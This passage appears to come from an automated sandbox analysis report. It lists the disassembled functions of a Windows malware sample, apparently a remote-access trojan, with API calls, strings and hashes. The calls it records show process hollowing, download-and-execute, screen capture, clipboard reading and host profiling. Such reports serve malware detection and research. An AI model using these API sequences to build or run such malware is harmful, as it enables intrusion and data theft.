                                                                                        • Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                                                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                                        • Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                                                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00408811
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                        • String ID:
                                                                                        • API String ID: 1771804793-0
                                                                                        • Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                                                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                                        • Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                                                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DownloadExecuteFileShell
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$open
                                                                                        • API String ID: 2825088817-2369784581
                                                                                        • Opcode ID: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                                                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                                        • Opcode Fuzzy Hash: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                                                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileFind$FirstNextsend
                                                                                        • String ID: XPG$XPG
                                                                                        • API String ID: 4113138495-1962359302
                                                                                        • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                                                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                                        • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                                                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                          • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                          • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                        • API String ID: 4127273184-3576401099
                                                                                        • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                                        • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                                                                        • ExitProcess.KERNEL32 ref: 004432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1703294689-263838557
                                                                                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                        • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                                                                        • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                        • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1815803762-0
                                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                                        • CloseClipboard.USER32 ref: 0040B725
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$CloseDataOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2058664381-0
                                                                                        • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                                        • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                                                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-3916222277
                                                                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$ComputerUser
                                                                                        • String ID:
                                                                                        • API String ID: 4229901323-0
                                                                                        • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                                        • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                                                                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                                                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                                                                        • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                                                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                                        • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                        • String ID: DISPLAY
                                                                                        • API String ID: 4256916514-865373369
                                                                                        • Opcode ID: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                                        • Opcode Fuzzy Hash: d098f0494e6cf70b6a27a8e3a9167c03c8027aa06e67c3efe5d1aa02d08667bb
                                                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004180EF Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                                        • GetLastError.KERNEL32 ref: 0041847A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                        • API String ID: 4188446516-108836778
                                                                                        • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                                        • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                                                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
